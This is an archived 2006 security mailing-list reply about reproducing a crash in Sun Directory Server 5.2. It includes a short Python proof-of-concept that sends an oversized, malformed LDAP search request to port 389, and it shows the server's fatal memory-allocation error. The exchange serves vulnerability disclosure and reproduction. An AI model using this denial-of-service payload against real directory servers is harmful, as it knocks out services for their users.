|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Dailydave] ??? Sun Directory Server 5.2 fun ???
From: Evgeny Legerov (admin
gleg.net)
Date: Fri Feb 10 2006 - 08:53:52 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi,
> payothlfree.fr wrote:
> Hi Evgeny,
>
> I tried your "ProtoVer LDAP" on the last DS5.2Patch4 but
>without success.
>
> It appears from the error message that the
> Directory Server shut itself down after trying to
>allocate 1.6GB of
> memory after receiving a 40K request from a client.
> From the sample
> packet provided, it was a subtree search request with a
>base DN of
> "dc={40,000 plus signs},dc=example,dc=com" with a filter
>of "(foo=*)". The
> search base DN is technically malformed, but even if
>that's the
> case, then it is no excuse for causing the Directory
>Server to allocate
> an excessive amount of memory and shut itself down.
>
> However, I have tested this issue on both Solaris and
>Linux and have
> been unable to reproduce it. I am sending exactly the
>same request as
> contained in the e-mail message describing the problem,
>but I can't seem
> to make the server try to allocate a significant amount
>of memory, shut
> down, or become unresponsive in any way. I will say
>that behavior of
> the Directory Server is not entirely correct in that it
>never sends a
> response to the client, but it will eventually terminate
>the client
> connection. It appears that the length of time before
>the server closes
> the connection to the client is equal to two times the
>configured value
> of the nsslapd-ioblocktimeout attribute.
>
> There is a legitimate way to exploit this problem that I
>haven't
> discovered yet.
> I think that there is a little bit more configuration
>required before this can
> be exercised
>
> If you can reproduce this problem for yourself and
>provide me
> with the details regarding how you were able to do, I
>will appreciate.
>
> Guillaume
Try the following simple code:
"""
from socket import *
s="\x30\x82\xea\x8b\x02\x01\x01\x63\x82\xea\x84\x04\x82\xea\x60"
s+="\x2b"*60000
s+="\x41\x01\x02\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b"
s+="\x6f\x62\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x02\x04\x00"
sock=socket(AF_INET, SOCK_STREAM)
sock.connect(("localhost",389))
sock.sendall(s)
"""
In my testing (default install of SD 5.2), the server
prints the following message and exits:
...
Memory allocation error calloc of 3600420010 bytes
failed; errno 12
...
Also you could try ProtoVer Sample LDAP testsuite
(http://www.gleg.net/protover_ldap_sample.shtml) which is
known to reproduce this particular problem.
Best regards,
Evgeny Legerov
CEO, GLEG Ltd.
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]